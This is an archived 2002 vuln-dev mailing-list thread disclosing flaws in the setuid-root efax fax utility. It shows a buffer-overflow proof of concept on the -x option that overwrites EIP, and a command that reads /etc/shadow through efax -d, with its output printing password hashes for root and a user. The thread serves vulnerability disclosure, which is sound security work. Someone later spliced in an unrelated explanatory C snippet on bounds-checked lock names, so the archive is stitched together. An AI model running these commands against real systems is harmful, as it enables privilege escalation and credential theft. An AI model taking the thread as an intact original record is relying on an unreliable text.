Re: efax

From: Wodahs Latigid (wodahsat_private)
Date: Wed Jan 16 2002 - 01:03:23 PST


    I found a buffer overflow in efax a while back,
    reported it and didn't get a response. Here's
    the original email:
    -----------------------------------------------
    To: edcat_private
    Subject: Efax Buffer Overflow
    You may or may not be interested (as this has no
    major impact on the outside world), but there
    is a buffer overflow in the -x function of
    efax. Obviously, efax should not be setuid
    root, but I can imagine a situation with an
    administrator doing so to give "trusted" users
    access to the fax facility.
    -----------------------------------------------
    
    And here's more detail:
    
    # cat /etc/mandrake-release
    Linux Mandrake release 8.0 (Traktopel) for i586
    
    Starting program: /usr/bin/efax -x `perl -e "print 'A' x 1200"`
    /usr/bin/efax: Wed Jan 16 09:54:49 2002 efax v 0.9 Copyright 1999 Ed Casas
    efax: 54:49 Error: can't open pre-lock file AAAA..[A's Cut]..AAAATMP..25717: File name too long
    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb) inf reg
    .. stuff cut ..
    edx            0x65656565       1701143909
    ebx            0x41414141       1094795585
    esp            0xbffefd58       0xbffefd58
    ebp            0x41414141       0x41414141
    esi            0x41414141       1094795585
    edi            0x41414141       1094795585
    eip            0x41414141       0x41414141
    .. stuff cut ..
    
    Digital Shadow
    http://www.ministryofpeace.co.uk/
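    The crash above (the "TMP..25717" temporary name built from the -x argument, then EIP = 0x41414141) is the classic fixed-buffer-plus-unbounded-copy pattern. As an added illustration that is not efax's own source, here is a bounds-checked builder for that name; the buffer size LOCK_NAME_MAX and the function names are assumptions made for this example.

```c
/* Added example, not efax's code: build "<lockfile>TMP..<pid>" into a
 * fixed-size buffer without ever writing past its end. The crash report
 * above shows what happens when this step trusts the argument's length.
 * LOCK_NAME_MAX and the function names are assumed for the illustration. */
#include <stdio.h>
#include <string.h>

#define LOCK_NAME_MAX 64   /* assumed size of the fixed destination buffer */

/* Returns 0 and fills out[] on success, -1 if the result would not fit.
 * snprintf writes at most LOCK_NAME_MAX bytes; its return value is the
 * length the untruncated string would have had, which is the overflow test. */
int build_lock_name(char out[LOCK_NAME_MAX], const char *lockfile, int pid)
{
    int need = snprintf(out, LOCK_NAME_MAX, "%sTMP..%d", lockfile, pid);
    if (need < 0 || need >= LOCK_NAME_MAX) {
        out[0] = '\0';      /* refuse rather than hand back a truncated name */
        return -1;
    }
    return 0;
}

/* Helper mirroring the 1200-byte probe above: is a lock-file argument of
 * 'len' repeated 'A's accepted (1), rejected (0), or too big to build (-1)? */
int lock_name_accepted(size_t len, int pid)
{
    char arg[2048];
    char out[LOCK_NAME_MAX];
    if (len >= sizeof arg)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    return build_lock_name(out, arg, pid) == 0;
}

int main(void)
{
    char out[LOCK_NAME_MAX];
    if (build_lock_name(out, "/var/lock/LCK..ttyS0", 25717) == 0)
        printf("ok: %s\n", out);
    printf("1200-byte argument accepted: %d\n", lock_name_accepted(1200, 25717));
    return 0;
}
```

The boundary sits exactly at LOCK_NAME_MAX - 1 characters of output: one byte more and the call is rejected instead of silently overrunning the buffer.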
    
    
    
    -----Original Message-----
    From: H D Moore <sflistat_private>
    Date: Tue, 15 Jan 2002 18:44:57 -0600
    To: VULN-DEVat_private
    Subject: efax
    
    
    > Didn't see this mentioned before...
    > 
    > hdm@sliver:~ > which efax
    > /opt/kde2/bin/efax
    > hdm@sliver:~ > ls -la /opt/kde2/bin/efax
    > -rwsr-xr-x    1 root     root        96689 Aug 16 10:23 /opt/kde2/bin/efax
    > hdm@sliver:~ > efax -h
    > efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    > efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    > efax: 43:28 compiled Aug 16 2001 10:23:23
    > efax: 43:28 Error: no argument for (-h)
    > Usage:
    >   efax [ option ]... [ -t num [ file... ] ]
    > Options:
    >   -a str  use command ATstr to answer
    >   -c cap  set modem and receive capabilites to cap
    >   -d dev  use modem on device dev
    >   -e cmd  exec "/bin/sh -c cmd" for voice calls
    >   -f fnt  use (PBM) font file fnt for headers
    >   -g cmd  exec "/bin/sh -c cmd" for data calls
    >   -h hdr  use page header hdr (use %d's for current page/total pages)
    >   -i str  send modem command ATstr at start
    >   -j str  send modem command ATstr after set fax mode
    >   -k str  send modem command ATstr when done
    >   -l id   set local identification to id
    >   -o opt  use protocol option opt:
    >       0     use class 2.0 instead of class 2 modem commands
    >       1     use class 1 modem commands
    >       2     use class 2 modem commands
    >       a     if first [data mode] answer attempt fails retry as fax
    >       e     ignore errors in modem initialization commands
    >       f     use virtual flow control
    >       h     use hardware flow control
    >       l     halve lock file polling interval
    >       n     ignore page retransmission requests
    >       r     do not reverse received bit order for Class 2 modems
    >       x     use XON instead of DC2 to trigger reception
    >       z     add 100 ms to pause before each modem comand (cumulative)
    >   -q ne   ask for retransmission if more than ne errors per page
    >   -r pat  save received pages into files pat.001, pat.002, ...
    >   -s      share (unlock) modem device while waiting for call
    >   -v lvl  print messages of type in string lvl (ewinchamr)
    >   -w      don't answer phone, wait for OK or CONNECT instead
    >   -x fil  use uucp-style lock file fil
    > Commands:
    >   -t      dial num and send fax image files file...
    > efax: 43:28 done, returning 2 (unrecoverable error)
    > hdm@sliver:~ > efax -d /etc/shadow
    > efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    > efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
    > efax: 43:35 compiled Aug 16 2001 10:23:23
    > efax: 43:35 opened /etc/shadow
    > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > efax: 43:35 Warning: unexpected response "root:sjSs9mscTsosA:11521:0:10000::::"
    > efax: 43:35 Warning: unexpected response "bin:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "daemon:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "lp:*:9473:0:10000::::"
    > efax: 43:35 Warning: unexpected response "news:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "uucp:*:0:0:10000::::"
    > efax: 43:35 Warning: unexpected response "games:*:0:0:10000::::"
    > efax: 43:35 Warning: unexpected response "man:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "at:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "lnx:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "mdom:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "yard:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "wwwrun:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "squid:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "postgres:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "fax:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "gnats:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "empress:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "adabas:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "amanda:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "ixess:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "irc:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "ftp:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "firewall:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "informix:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "named:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "virtuoso:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "fnet:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "gdm:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "postfix:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "cyrus:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "nps:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "skyrix:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "dbmaker:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "fixadm:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "fib:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "fixlohn:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "mysql:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "dpbox:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "ingres:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "codadmin:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "zope:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "vscan:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "wnn:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "pop:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "perforce:*:8902:0:10000::::"
    > efax: 43:35 Warning: unexpected response "nobody:*:0:0:10000::::"
    > efax: 43:35 Warning: unexpected response "hdm:snBsN0stfzsMg:11564:0:99999:7:0::"
    > efax: 43:35 Warning: unexpected response "oracle:!:11556:0:99999:3:0::"
    > efax: 43:35 Warning: unexpected response "yaku:!:11636:0:99999:3:0::"
    > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > efax: 43:35 sync: dropping DTR
    > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > efax: 43:36 sync: sending escapes
    > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > efax: 43:37 Error: sync: modem not responding
    > efax: 43:37 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for device
    > efax: 43:37 done, returning 2 (unrecoverable error)
    > 
    > -- 
    > H D Moore
    > http://www.digitaldefense.net - work
    > http://www.digitaloffense.net - play
    > 
    > 
    



    This archive was generated by hypermail 2b30 : Wed Jan 16 2002 - 17:58:17 PST